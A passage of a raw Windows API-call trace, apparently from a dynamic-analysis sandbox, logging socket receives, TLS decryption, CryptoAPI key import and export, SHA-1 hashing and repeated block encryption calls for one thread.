hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4165d0 | out: hHeap=0x3c0000) returned 1 Thread: id = 170 os_tid = 0x1354 [0155.158] SetEvent (hEvent=0x558) returned 1 [0155.171] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0155.171] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0155.466] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0155.466] malloc (_Size=0x1fd) returned 0x3d81e60 [0155.466] free (_Block=0x0) [0155.467] malloc (_Size=0x1fd) returned 0x3df00e0 [0155.467] free (_Block=0x0) [0155.467] free (_Block=0x0) [0155.467] free (_Block=0x3d81e60) [0155.467] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f5d8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f5d4 | out: phKey=0x339f5d4*=0x3e10d8) returned 1 [0155.470] CryptExportKey (in: hKey=0x3e10d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f23c, pdwDataLen=0x339f224 | out: pbData=0x339f23c*, pdwDataLen=0x339f224*=0x90) returned 1 [0155.470] CryptExportKey (in: hKey=0x3e10d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f908, pdwDataLen=0x339f5cc | out: pbData=0x339f908*, pdwDataLen=0x339f5cc*=0x90) returned 1 [0155.470] malloc (_Size=0x80) returned 0x60a3e0 [0155.471] free (_Block=0x0) [0155.471] CryptDestroyKey (hKey=0x3e10d8) returned 1 [0155.471] malloc (_Size=0x64) returned 0x60b230 [0155.471] free (_Block=0x0) [0155.471] malloc (_Size=0x80) returned 0x6097a8 [0155.471] free (_Block=0x0) [0155.471] malloc (_Size=0xc0) returned 0x3594f20 [0155.471] free (_Block=0x6097a8) [0155.471] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0155.471] CryptHashData (hHash=0x3e0e18, pbData=0x3594f20, dwDataLen=0x81, dwFlags=0x0) returned 1 [0155.471] malloc (_Size=0x14) returned 0x3f65480 [0155.471] free (_Block=0x0) [0155.471] CryptGetHashParam (in: hHash=0x3e0e18, dwParam=0x2, pbData=0x3f65480, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65480, pdwDataLen=0x339fa54) returned 1 [0155.471] CryptDestroyHash (hHash=0x3e0e18) returned 1 [0155.471] free (_Block=0x3f65480) [0155.471] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0155.471] CryptHashData (hHash=0x3e0b58, pbData=0x3594f20, dwDataLen=0x81, dwFlags=0x0) returned 1 [0155.471] malloc (_Size=0x14) returned 0x3f652c0 [0155.471] free (_Block=0x0) [0155.471] CryptGetHashParam (in: hHash=0x3e0b58, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x339fa54) returned 1 [0155.471] CryptDestroyHash (hHash=0x3e0b58) returned 1 [0155.471] free (_Block=0x3f652c0) [0155.471] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0155.472] CryptHashData (hHash=0x3e0c58, pbData=0x3594f20, dwDataLen=0x81, dwFlags=0x0) returned 1 [0155.472] malloc (_Size=0x14) returned 0x3f651e0 [0155.472] free (_Block=0x0) [0155.472] CryptGetHashParam (in: hHash=0x3e0c58, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x339fa54) returned 1 [0155.472] CryptDestroyHash (hHash=0x3e0c58) returned 1 [0155.472] free (_Block=0x3f651e0) [0155.472] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0155.472] CryptHashData (hHash=0x3e0b58, pbData=0x3594f20, dwDataLen=0x81, dwFlags=0x0) returned 1 [0155.472] malloc (_Size=0x14) returned 0x3f65280 [0155.472] free (_Block=0x0) [0155.472] CryptGetHashParam (in: hHash=0x3e0b58, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0155.472] CryptDestroyHash (hHash=0x3e0b58) returned 1 [0155.472] free (_Block=0x3f65280) [0155.472] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0155.472] CryptHashData (hHash=0x3e0b58, pbData=0x3594f20, dwDataLen=0x81, dwFlags=0x0) returned 1 [0155.472] malloc (_Size=0x14) returned 0x3f65300 [0155.472] free (_Block=0x0) [0155.472] CryptGetHashParam (in: hHash=0x3e0b58, dwParam=0x2, pbData=0x3f65300, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65300, pdwDataLen=0x339fa54) returned 1 [0155.472] CryptDestroyHash (hHash=0x3e0b58) returned 1 [0155.472] free (_Block=0x3f65300) [0155.472] free (_Block=0x3594f20) [0155.472] malloc (_Size=0x50) returned 0x3d9a930 [0155.472] free (_Block=0x0) [0155.472] free (_Block=0x60b230) [0155.473] free (_Block=0x60a3e0) [0155.473] malloc (_Size=0xb8) returned 0x3594f20 [0155.473] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3594fd0 | out: phHash=0x3594fd0) returned 1 [0155.473] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3594fd4 | out: phHash=0x3594fd4) returned 1 [0155.473] CryptHashData (hHash=0x3e0ed8, pbData=0x339fa74, dwDataLen=0x14, dwFlags=0x0) returned 1 [0155.473] CryptHashData (hHash=0x3e0f58, pbData=0x339faf4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0155.473] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x3e10d8) returned 1 [0155.473] CryptSetKeyParam (hKey=0x3e10d8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0155.473] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x3e0e18) returned 1 [0155.473] CryptSetKeyParam (hKey=0x3e0e18, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0155.473] free (_Block=0x3d9a930) [0155.473] malloc (_Size=0x10) returned 0x3648ef0 [0155.473] free (_Block=0x0) [0155.473] SetEvent (hEvent=0x3a4) returned 1 [0155.473] free (_Block=0x3df00e0) [0155.473] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0155.473] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0155.947] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0155.947] malloc (_Size=0x1fd) returned 0x3d81e60 [0155.947] free (_Block=0x0) [0155.947] malloc (_Size=0x1fd) returned 0x606048 [0155.947] free (_Block=0x0) [0155.947] free (_Block=0x0) [0155.947] free (_Block=0x3d81e60) [0155.947] malloc (_Size=0x1fd) returned 0x3d81e60 [0155.947] free (_Block=0x0) [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.948] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0155.949] malloc (_Size=0x1fd) returned 0x3691270 [0155.950] free (_Block=0x0) [0155.950] free (_Block=0x606048) [0155.950] malloc (_Size=0x1fd) returned 0x606048 [0155.950] free (_Block=0x0) [0155.950] CryptDuplicateHash (in: hHash=0x3e0f58, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0155.950] CryptHashData (hHash=0x3e0b98, pbData=0x606048, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0155.950] malloc (_Size=0x14) returned 0x3f65500 [0155.950] free (_Block=0x0) [0155.950] CryptGetHashParam (in: hHash=0x3e0b98, dwParam=0x2, pbData=0x3f65500, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65500, pdwDataLen=0x339faec) returned 1 [0155.950] CryptHashData (hHash=0x3e0f58, pbData=0x606048, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0155.950] free (_Block=0x3f65500) [0155.950] CryptDestroyHash (hHash=0x3e0b98) returned 1 [0155.950] free (_Block=0x606048) [0155.950] free (_Block=0x3d81e60) [0155.950] malloc (_Size=0x1fd) returned 0x3d81e60 [0155.950] free (_Block=0x0) [0155.950] malloc (_Size=0x94) returned 0x3df0550 [0155.950] free (_Block=0x0) [0155.950] malloc (_Size=0x94) returned 0x3df05f0 [0155.951] free (_Block=0x0) [0155.951] free (_Block=0x0) [0155.951] free (_Block=0x3df0550) [0155.951] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f5d8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f5d4 | out: phKey=0x339f5d4*=0x3e0b98) returned 1 [0155.954] CryptExportKey (in: hKey=0x3e0b98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f23c, pdwDataLen=0x339f224 | out: pbData=0x339f23c*, pdwDataLen=0x339f224*=0x90) returned 1 [0155.954] CryptExportKey (in: hKey=0x3e0b98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f908, pdwDataLen=0x339f5cc | out: pbData=0x339f908*, pdwDataLen=0x339f5cc*=0x90) returned 1 [0155.954] malloc (_Size=0x80) returned 0x609ad8 [0155.955] free (_Block=0x0) [0155.955] CryptDestroyKey (hKey=0x3e0b98) returned 1 [0155.955] malloc (_Size=0x64) returned 0x60b000 [0155.955] free (_Block=0x0) [0155.955] malloc (_Size=0x80) returned 0x60a248 [0155.955] free (_Block=0x0) [0155.955] malloc (_Size=0xc0) returned 0x606048 [0155.955] free (_Block=0x60a248) [0155.955] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0155.955] CryptHashData (hHash=0x3e0b98, pbData=0x606048, dwDataLen=0x81, dwFlags=0x0) returned 1 [0155.955] malloc (_Size=0x14) returned 0x3f65280 [0155.955] free (_Block=0x0) [0155.955] CryptGetHashParam (in: hHash=0x3e0b98, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0155.955] CryptDestroyHash (hHash=0x3e0b98) returned 1 [0155.955] free (_Block=0x3f65280) [0155.955] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0155.955] CryptHashData (hHash=0x3e0b98, pbData=0x606048, dwDataLen=0x81, dwFlags=0x0) returned 1 [0155.955] malloc (_Size=0x14) returned 0x3f65480 [0155.955] free (_Block=0x0) [0155.955] CryptGetHashParam (in: hHash=0x3e0b98, dwParam=0x2, pbData=0x3f65480, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65480, pdwDataLen=0x339fa54) returned 1 [0155.956] CryptDestroyHash (hHash=0x3e0b98) returned 1 [0155.956] free (_Block=0x3f65480) [0155.956] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0155.956] CryptHashData (hHash=0x3e0b98, pbData=0x606048, dwDataLen=0x81, dwFlags=0x0) returned 1 [0155.956] malloc (_Size=0x14) returned 0x3f653e0 [0155.956] free (_Block=0x0) [0155.956] CryptGetHashParam (in: hHash=0x3e0b98, dwParam=0x2, pbData=0x3f653e0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f653e0, pdwDataLen=0x339fa54) returned 1 [0155.956] CryptDestroyHash (hHash=0x3e0b98) returned 1 [0155.956] free (_Block=0x3f653e0) [0155.956] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0155.956] CryptHashData (hHash=0x3e0b98, pbData=0x606048, dwDataLen=0x81, dwFlags=0x0) returned 1 [0155.956] malloc (_Size=0x14) returned 0x3f652c0 [0155.956] free (_Block=0x0) [0155.956] CryptGetHashParam (in: hHash=0x3e0b98, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x339fa54) returned 1 [0155.956] CryptDestroyHash (hHash=0x3e0b98) returned 1 [0155.956] free (_Block=0x3f652c0) [0155.956] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0155.956] CryptHashData (hHash=0x3e0b98, pbData=0x606048, dwDataLen=0x81, dwFlags=0x0) returned 1 [0155.956] malloc (_Size=0x14) returned 0x3f65480 [0155.956] free (_Block=0x0) [0155.956] CryptGetHashParam (in: hHash=0x3e0b98, dwParam=0x2, pbData=0x3f65480, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65480, pdwDataLen=0x339fa54) returned 1 [0155.956] CryptDestroyHash (hHash=0x3e0b98) returned 1 [0155.957] free (_Block=0x3f65480) [0155.957] free (_Block=0x606048) [0155.957] malloc (_Size=0x50) returned 0x3d9aa38 [0155.957] free (_Block=0x0) [0155.957] free (_Block=0x60b000) [0155.957] free (_Block=0x609ad8) [0155.957] malloc (_Size=0xb8) returned 0x606048 [0155.957] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x6060f8 | out: phHash=0x6060f8) returned 1 [0155.957] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x6060fc | out: phHash=0x6060fc) returned 1 [0155.957] CryptHashData (hHash=0x3e0b98, pbData=0x339fa74, dwDataLen=0x14, dwFlags=0x0) returned 1 [0155.957] CryptHashData (hHash=0x3e0bd8, pbData=0x339faf4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0155.957] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x3e0c58) returned 1 [0155.957] CryptSetKeyParam (hKey=0x3e0c58, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0155.957] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x3e1998) returned 1 [0155.957] CryptSetKeyParam (hKey=0x3e1998, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0155.957] free (_Block=0x3d9aa38) [0155.957] SetEvent (hEvent=0x3a4) returned 1 [0155.957] free (_Block=0x3df05f0) [0155.957] free (_Block=0x3d81e60) [0155.957] free (_Block=0x3691270) [0155.958] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0155.958] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0156.269] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0156.269] malloc (_Size=0x1fd) returned 0x606108 [0156.269] free (_Block=0x0) [0156.270] malloc (_Size=0x1fd) returned 0x3d81e60 [0156.270] free (_Block=0x0) [0156.270] free (_Block=0x0) [0156.270] free (_Block=0x606108) [0156.270] malloc (_Size=0x1fd) returned 0x606108 [0156.270] free (_Block=0x0) [0156.270] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.270] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.270] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.270] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.270] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.270] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.270] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, 